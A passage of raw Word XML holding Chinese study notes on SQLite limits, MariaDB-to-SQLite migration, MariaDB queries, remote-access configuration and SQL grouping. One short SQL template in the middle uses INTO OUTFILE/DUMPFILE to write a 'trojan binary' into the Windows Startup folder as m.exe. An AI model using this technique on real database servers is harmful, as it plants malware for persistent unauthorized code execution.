        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>因为这些问题是文件系统执行的时候本质上存在的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">bug, </w:t>
      </w:r>
      <w:r>
        <w:t>因此</w:t>
      </w:r>
      <w:r>
        <w:t>SQLite</w:t>
      </w:r>
      <w:r>
        <w:t>没有办法避免它们</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>经验告诉我们</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>应该避免在许多计算机需要通过一个网络文件系统同时访问同一个数据库的情况下使用</w:t>
      </w:r>
      <w:r>
        <w:t>SQLite.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:t>高流量网站</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>SQLite</w:t>
      </w:r>
      <w:r>
        <w:t>通常情况下用作一个网站的后台数据库可以很好的工作</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>但是如果你的网站的访问量大到你开始考虑采取分布式的数据库部署</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>那么你应当毫不犹豫的考虑用一个企业级的客户端</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>服务器数据库来替代</w:t>
      </w:r>
      <w:r>
        <w:t>SQLite.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t>超大的数据集</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>当你在</w:t>
      </w:r>
      <w:r>
        <w:t>SQLite</w:t>
      </w:r>
      <w:r>
        <w:t>中开始一个事务处理的时候</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>事务处理会在任何写操作发生之前产生</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>而不是必须要显示的调用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">BEGIN...COMMIT), </w:t>
      </w:r>
      <w:r>
        <w:t>数据库引擎将不得不分配一小块脏页</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>文件缓冲页面</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>来帮助它自己管理回滚操作</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>每</w:t>
      </w:r>
      <w:r>
        <w:t>1MB</w:t>
      </w:r>
      <w:r>
        <w:t>的数据库文件</w:t>
      </w:r>
      <w:r>
        <w:t>SQLite</w:t>
      </w:r>
      <w:r>
        <w:t>需要</w:t>
      </w:r>
      <w:r>
        <w:t>256</w:t>
      </w:r>
      <w:r>
        <w:t>字节</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>对于小型的数据库这些空间不算什么</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>但是当数据库增长到数十亿字节的时候</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>缓冲页面的尺寸就会相当的大了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>如果你需要存储或修改几十</w:t>
      </w:r>
      <w:r>
        <w:t>GB</w:t>
      </w:r>
      <w:r>
        <w:t>的数据</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>你应该考虑用其他的数据库引擎</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:t>高并发访问</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>SQLite</w:t>
      </w:r>
      <w:r>
        <w:t>对于整个数据库文件进行读取</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>写入锁定</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>这意味着如果任何进程读取了数据库中的某一部分</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>其他所有进程都不能再对该数据库的任何部分进行写入操作</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>同样的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>如果任何一个进程在对数据库进行写入操作</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>其他所有进程都不能再读取该数据库的任何部分</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>对于大多数情况这不算是什么问题</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>在这些情况下每个程序使用数据库的时间都很短暂</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>并且不会独占</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>这样锁定至多会存在十几毫秒</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>但是如果有些程序需要高并发</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>那么这些程序就需要寻找其他的解决方案了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>SQLite</w:t>
      </w:r>
      <w:r>
        <w:t>的喊出是这是种进程内数据库，基于纯</w:t>
      </w:r>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>代码，不需要额外的安装（不需要独立的数据库引擎）且支持大部分</w:t>
      </w:r>
      <w:r>
        <w:t>ANSISQL92</w:t>
      </w:r>
      <w:r>
        <w:t>标准。</w:t>
      </w:r>
      <w:r>
        <w:t>SQLite</w:t>
      </w:r>
      <w:r>
        <w:t>在需要持久化存储的时候是直接写入硬盘的，如果不需要进行持久化存储就直接写入内存。所以</w:t>
      </w:r>
      <w:r>
        <w:t>SQLite</w:t>
      </w:r>
      <w:r>
        <w:t>被常用于</w:t>
      </w:r>
      <w:r>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:t>开发与</w:t>
      </w:r>
      <w:r>
        <w:t>Qt</w:t>
      </w:r>
      <w:r>
        <w:t>中。使用</w:t>
      </w:r>
      <w:r>
        <w:t>gcc</w:t>
      </w:r>
      <w:r>
        <w:t>编译出来，内存占用效果良好，据说少于</w:t>
      </w:r>
      <w:r>
        <w:t>250KB</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>可视化管理工具：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>firefox</w:t>
      </w:r>
      <w:r>
        <w:t>插件：</w:t>
      </w:r>
      <w:r>
        <w:t>SQLite Manager</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>SQLiteSpy</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">SQLiteStudio </w:t>
      </w:r>
      <w:r>
        <w:t>都是免费的单文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">SQLite Expert Professional </w:t>
      </w:r>
      <w:r>
        <w:t>需要安装，</w:t>
      </w:r>
      <w:r>
        <w:t>30</w:t>
      </w:r>
      <w:r>
        <w:t>天试用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>将数据库从</w:t>
      </w:r>
      <w:r>
        <w:t>Mariadb</w:t>
      </w:r>
      <w:r>
        <w:t>导入到</w:t>
      </w:r>
      <w:r>
        <w:t>Sqlite</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>主键的导入还是有问题的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>方法一、</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:t>我用</w:t>
      </w:r>
      <w:r>
        <w:t>ESF Database Migration Toolkit</w:t>
      </w:r>
      <w:r>
        <w:t>工具可以直接把索引、数据、及表结构都导出来了，现在还差个外键约束没搞定了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>2.PowerDesinger</w:t>
      </w:r>
      <w:r>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:t>sqliteodbc</w:t>
      </w:r>
      <w:r>
        <w:t>插件后，直接将数据库生成</w:t>
      </w:r>
      <w:r>
        <w:t>SQLite</w:t>
      </w:r>
      <w:r>
        <w:t>语句来解决主外键的问题的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>方法二、</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">Navicat Premium </w:t>
      </w:r>
      <w:r>
        <w:t>（支持</w:t>
      </w:r>
      <w:r>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Oracle</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">SQLite </w:t>
      </w:r>
      <w:r>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL Serve </w:t>
      </w:r>
      <w:r>
        <w:t>的数据库管理工具）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:t>先把</w:t>
      </w:r>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:r>
        <w:t>导出成</w:t>
      </w:r>
      <w:r>
        <w:t>txt</w:t>
      </w:r>
      <w:r>
        <w:t>文件，记住</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>包含列表的标题</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r>
        <w:t>复选框要勾选，</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>否则生成的</w:t>
      </w:r>
      <w:r>
        <w:t>txt</w:t>
      </w:r>
      <w:r>
        <w:t>没有键。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:t>打开</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Navicate Premium </w:t>
      </w:r>
      <w:r>
        <w:t>，新建</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">SQLite </w:t>
      </w:r>
      <w:r>
        <w:t>连接</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t>把第一步导出的</w:t>
      </w:r>
      <w:r>
        <w:t>txt</w:t>
      </w:r>
      <w:r>
        <w:t>文件导入到第二步新建的</w:t>
      </w:r>
      <w:r>
        <w:t>SQLite</w:t>
      </w:r>
      <w:r>
        <w:t>数据库中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>方法三、</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>mysqldump</w:t>
      </w:r>
      <w:r>
        <w:t>导出以后，直接使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Sqlite Expert </w:t>
      </w:r>
      <w:r>
        <w:t>中新建数据库，然后在数据库中选中</w:t>
      </w:r>
      <w:r>
        <w:t>SQL Tab</w:t>
      </w:r>
      <w:r>
        <w:t>，导入</w:t>
      </w:r>
      <w:r>
        <w:t>dump</w:t>
      </w:r>
      <w:r>
        <w:t>出来的</w:t>
      </w:r>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
      <w:r>
        <w:t>备份文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>虚拟机没有关机，主机就关了。然后导致</w:t>
      </w:r>
      <w:r>
        <w:t>PE</w:t>
      </w:r>
      <w:r>
        <w:t>数据库丢失。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>数据库的神奇问题：虽然可以查到，但是不能返回？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MariaDB [PE]&gt; select question from exam where question like "%</w:t>
      </w:r>
      <w:r>
        <w:t>下降过程中</w:t>
      </w:r>
      <w:r>
        <w:t>%";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| question                                                                                                                                                                                              |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:t>）下降器；（</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:t>）上升器；（</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3 </w:t>
      </w:r>
      <w:r>
        <w:t>）主绳；（</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 4 </w:t>
      </w:r>
      <w:r>
        <w:t>）安全带；（</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 5 </w:t>
      </w:r>
      <w:r>
        <w:t>）手套；（</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 6 </w:t>
      </w:r>
      <w:r>
        <w:t>）胸绳</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                                                            |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:r>
        <w:t>查到的题目也就是这个东西了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MariaDB [collage]&gt; describe birth;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+------------+------+-----+---------+-------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| Field    | Type       | Null | Key | Default | Extra |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+------------+------+-----+---------+-------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| name     | varchar(3) | YES  |     | NULL    |       |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| birthday | int(2)     | YES  |     | NULL    |       |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+------------+------+-----+---------+-------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>2 rows in set (0.00 sec)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">MariaDB [collage]&gt; delete from birth where birthday="0827"; </w:t>
      </w:r>
      <w:r>
        <w:t>成功删掉了一个</w:t>
      </w:r>
      <w:r>
        <w:t>827</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">delete from </w:t>
      </w:r>
      <w:r>
        <w:t>只能一个个表格删除，不像</w:t>
      </w:r>
      <w:r>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>select '16</w:t>
      </w:r>
      <w:r>
        <w:t>进制</w:t>
      </w:r>
      <w:r>
        <w:t>' into outfile '</w:t>
      </w:r>
      <w:r>
        <w:t>路径</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>比如</w:t>
      </w:r>
      <w:r>
        <w:t>C:\\Documents and Setting\\Admnistrator\\[</w:t>
      </w:r>
      <w:r>
        <w:t>开始</w:t>
      </w:r>
      <w:r>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:t>菜单</w:t>
      </w:r>
      <w:r>
        <w:t>\\</w:t>
      </w:r>
      <w:r>
        <w:t>程序</w:t>
      </w:r>
      <w:r>
        <w:t>\\</w:t>
      </w:r>
      <w:r>
        <w:t>启动</w:t>
      </w:r>
      <w:r>
        <w:t>\\m.exe)'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>&lt;=&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>create table a(cmd blob)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>insert into a values(convert(</w:t>
      </w:r>
      <w:r>
        <w:t>木马二进制</w:t>
      </w:r>
      <w:r>
        <w:t>, char));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>select * rom a into dumpfile '</w:t>
      </w:r>
      <w:r>
        <w:t>路径</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>比如</w:t>
      </w:r>
      <w:r>
        <w:t>C:\\Documents and Setting\\Admnistrator\\[</w:t>
      </w:r>
      <w:r>
        <w:t>开始</w:t>
      </w:r>
      <w:r>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:t>菜单</w:t>
      </w:r>
      <w:r>
        <w:t>\\</w:t>
      </w:r>
      <w:r>
        <w:t>程序</w:t>
      </w:r>
      <w:r>
        <w:t>\\</w:t>
      </w:r>
      <w:r>
        <w:t>启动</w:t>
      </w:r>
      <w:r>
        <w:t>\\m.exe)'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>drop table a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>远程访问：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>kali</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:t>/etc/mysql/mysql.conf.d/mysqld.cnf</w:t>
      </w:r>
      <w:r>
        <w:t>（而不是网上说的</w:t>
      </w:r>
      <w:r>
        <w:t>/etc/mysql/my.cnf</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>里面的</w:t>
      </w:r>
      <w:r>
        <w:t>bind-address= 127.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:t>与本地进行了绑定。我注释掉以后查看端口还是一样，后来发现</w:t>
      </w:r>
      <w:r>
        <w:t>/etc/mysql/mariadb.conf.d/50-server.cnf</w:t>
      </w:r>
      <w:r>
        <w:t>中也有</w:t>
      </w:r>
      <w:r>
        <w:t>bind-address.</w:t>
      </w:r>
      <w:r>
        <w:t>之后</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">netstat </w:t>
      </w:r>
      <w:r>
        <w:t>就会变成</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tcp6 :::3306 :::* LISTEN 2300/mysqld </w:t>
      </w:r>
      <w:r>
        <w:t>之前还一直是</w:t>
      </w:r>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:r>
        <w:t>基于</w:t>
      </w:r>
      <w:r>
        <w:t>ipv4.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>所以默认情况下将只有本地可以访问数据库。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MariaDB [(none)]&gt; SELECT User, Host FROM mysql.user WHERE Host &lt;&gt; 'localhost';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+------+--------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| User | Host               |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+------+--------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| root | %                  |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| root | 127.0.0.1          |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| root | ::1                |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| root | aphrodite.kali.org |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+------+--------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:t>是通配符，还可以</w:t>
      </w:r>
      <w:r>
        <w:t>192.168.1.%</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">root@% </w:t>
      </w:r>
      <w:r>
        <w:t>需要自己去</w:t>
      </w:r>
      <w:r>
        <w:t>insert</w:t>
      </w:r>
      <w:r>
        <w:t>并且给出足够的权限。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>数据库脱敏：指对数据库中的敏感数据进行在线屏蔽、变形、字符替换、随机替换等处理方式，达到对用户访问敏感数据真实内容的权限控制，对于存储在数据库中的敏感数据，通过脱敏方式，不同权限的用户将会看到不同的展现结果，从而实现对敏感隐私数据的保护。数据库脱敏又称数据漂白或数据变形，其关键点为：敏感数据、脱敏规则（不一定是可以恢复的）、应用场景。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>UDF</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">User defined function </w:t>
      </w:r>
      <w:r>
        <w:t>用户自定义函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>函数是不允许出现在</w:t>
      </w:r>
      <w:r>
        <w:t>where</w:t>
      </w:r>
      <w:r>
        <w:t>语句中间，可以出现在</w:t>
      </w:r>
      <w:r>
        <w:t>where</w:t>
      </w:r>
      <w:r>
        <w:t>内的子查询</w:t>
      </w:r>
      <w:r>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:t>中。查询有三科或三科以上成绩在</w:t>
      </w:r>
      <w:r>
        <w:t>80</w:t>
      </w:r>
      <w:r>
        <w:t>分以上的学生学号，只能使用</w:t>
      </w:r>
      <w:r>
        <w:t>having</w:t>
      </w:r>
      <w:r>
        <w:t>子语句：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>SELECT Sno FROM SC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">   WHERE Grade&gt;=80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>GROUP BY Sno    --</w:t>
      </w:r>
      <w:r>
        <w:t>可以指定多个</w:t>
      </w:r>
      <w:r>
        <w:t>group by</w:t>
      </w:r>
      <w:r>
        <w:t>的字段，优先级按照从前至后递减</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">HAVING (COUNT(Cno)&gt;=3);  </w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:t>包含了主键，那么在</w:t>
      </w:r>
      <w:r>
        <w:t>group by</w:t>
      </w:r>
      <w:r>
        <w:t>就必须要加上主键。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>聚合函数调用不能嵌套，需要通过子查询（嵌套的</w:t>
      </w:r>
      <w:r>
        <w:t>select</w:t>
      </w:r>
      <w:r>
